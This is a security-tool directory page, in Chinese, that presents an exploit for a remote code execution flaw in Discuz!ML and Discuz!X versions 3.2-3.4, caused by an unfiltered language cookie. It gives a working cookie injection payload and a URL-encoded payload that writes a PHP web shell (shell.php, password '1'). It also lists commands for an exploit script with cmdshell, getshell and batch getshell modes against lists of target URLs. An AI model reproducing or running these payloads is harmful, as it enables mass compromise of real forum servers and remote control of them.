Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
discuz-ml-rce — 影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 | Kitploit
工具/GitHubGitHub/ianxtianxt/discuz-ml-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubianxtianxt/discuz-ml-rce

discuz-ml-rce

影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4

查看仓库
976年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

discuz-ml-rce

影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。

cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE

抓包找到cookie的language的值修改为

xxxx_xxxx_language=sc'.phpinfo().'

getshell

%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27 实际为:

'.+file_put_contents('shell.php',urldecode('')).'

即可在路径下生成shell.php,连接密码为1

============================================================================================================================================================== 判断是否存在漏洞

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"

cmdshell模式

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell

getshell模式

python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell

批量检测

python dz-ml-rce.py -f urls.txt

批量getshell

python dz-ml-rce.py -f urls.txt --getshell

下载工具